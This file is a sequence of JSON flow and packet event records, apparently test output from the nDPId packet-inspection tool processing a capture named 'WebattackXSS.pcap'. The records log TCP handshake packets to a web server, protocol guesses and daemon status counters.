-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1499347531303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvhAAD4GktisEAABwKgKMuNIAFARgDytAAAAAKACchAdrgAAAgQFtAQCCAoBOw5VAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":2,"flow_last_seen":1499347531303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ40hb80TSEYA8rqAScSCaFwAAAgQFtAQCCAoD5N\/LATsOVQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4703,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":3,"flow_last_seen":1499347531304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347531304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvlAAD4Gkt+sEAABwKgKMuNIAFARgDyuW\/NE04AQAOU5HgAAAQEICgE7DlYD5N\/L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347532560,"flow_last_seen":1499347532560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347532560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1499347532560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ro1AAD4GF0OsEAABwKgKMuNWAFA1F6EdAAAAAKACchCUXQAAAgQFtAQCCAoBOw+QAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":1499347532560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ41Zu3G2tNRehHqAScSDTyAAAAgQFtAQCCAoD5OEFATsPkAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4715,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":3,"flow_last_seen":1499347532561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347532561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ro5AAD4GF0qsEAABwKgKMuNWAFA1F6EebtxtroAQAOVy0AAAAQEICgE7D5AD5OEF"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347535081,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347535081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vMpAAD4GCQasEAABwKgKMuNwAFAre67MAAAAAKACchCNugAAAgQFtAQCCAoBOxIGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4735,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347535081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ43Bd+kT3K3uuzaAScSAESAAAAgQFtAQCCAoD5ON7ATsSBgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4736,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":1499347535081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347535081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vMtAAD4GCQ2sEAABwKgKMuNwAFAre67NXfpE+IAQAOWjTwAAAQEICgE7EgYD5ON7"} -00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4740,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":4740,"packets-processed":4739,"total-skipped-flows":0,"total-l4-data-len":2075670,"total-not-detected-flows":0,"total-guessed-flows":245,"total-detected-flows":13,"total-detection-updates":0,"total-updates":0,"current-active-flows":79,"total-active-flows":334,"total-idle-flows":255,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1852,"global_ts_msec":1499347536104} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347536332,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGJAAD4GPW6sEAABwKgKMuN+AFBSPZtdAAAAAKACchB5IAAAAgQFtAQCCAoBOxM\/AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":1499347536332,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347536332,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ434l0Xf0Uj2bXqAScSDzoAAAAgQFtAQCCAoD5OS0ATsTPwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4745,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":3,"flow_last_seen":1499347536333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347536333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGNAAD4GPXWsEAABwKgKMuN+AFBSPZteJdF39YAQAOWSqAAAAQEICgE7Ez8D5OS0"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347412160,"flow_last_seen":1499347417729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56912,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347413405,"flow_last_seen":1499347418729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56926,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347414709,"flow_last_seen":1499347419729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347407100,"flow_last_seen":1499347412728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56858,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347408367,"flow_last_seen":1499347413728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56872,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347409644,"flow_last_seen":1499347414728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347536759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347537591,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347537591,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UmRAAD4Gc2ysEAABwKgKMuOMAFC1fUYeAAAAAKACchBp1gAAAgQFtAQCCAoBOxR6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":2,"flow_last_seen":1499347537591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347537591,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ44xyZUlKtX1GH6AScSDFMQAAAgQFtAQCCAoD5OXvATsUegEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":3,"flow_last_seen":1499347537592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347537592,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UmVAAD4Gc3OsEAABwKgKMuOMAFC1fUYfcmVJS4AQAOVkOQAAAQEICgE7FHoD5OXv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347540145,"flow_last_seen":1499347540145,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347540145,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4774,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1499347540145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8BSZAAD4GwKqsEAABwKgKMuOmAFDsIBPeAAAAAKACchBi2wAAAgQFtAQCCAoBOxb4AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4775,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":2,"flow_last_seen":1499347540145,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347540145,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ46adBfH37CAT36AScSDoagAAAgQFtAQCCAoD5OhtATsW+AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4776,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":3,"flow_last_seen":1499347540146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347540146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0BSdAAD4GwLGsEAABwKgKMuOmAFDsIBPfnQXx+IAQAOWHcgAAAQEICgE7FvgD5Oht"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347541398,"flow_last_seen":1499347541398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347541398,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1499347541398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WJdAAD4GbTmsEAABwKgKMuO0AFCKGUCmAAAAAKACchCW0wAAAgQFtAQCCAoBOxgxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":2,"flow_last_seen":1499347541398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347541398,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ47RdwzayihlAp6AScSAVsQAAAgQFtAQCCAoD5OmnATsYMQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":3,"flow_last_seen":1499347541399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347541399,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WJhAAD4GbUCsEAABwKgKMuO0AFCKGUCnXcM2s4AQAOW0uAAAAQEICgE7GDED5Omn"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347542648,"flow_last_seen":1499347542648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347542648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4797,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1499347542648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80V9AAD4G9HCsEAABwKgKMuPCAFCPt8g1AAAAAKACchAIXwAAAgQFtAQCCAoBOxlqAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":2,"flow_last_seen":1499347542648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347542648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ48Js\/FwIj7fINqAScSBRdQAAAgQFtAQCCAoD5OrfATsZagEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":3,"flow_last_seen":1499347542649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347542649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00WBAAD4G9HesEAABwKgKMuPCAFCPt8g2bPxcCYAQAOXwfAAAAQEICgE7GWoD5Orf"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347545176,"flow_last_seen":1499347545176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347545176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1499347545176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347545176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HVZAAD4GqHqsEAABwKgKMuPcAFAahQa0AAAAAKACchA8gQAAAgQFtAQCCAoBOxviAAAAAAEDAwc="} 
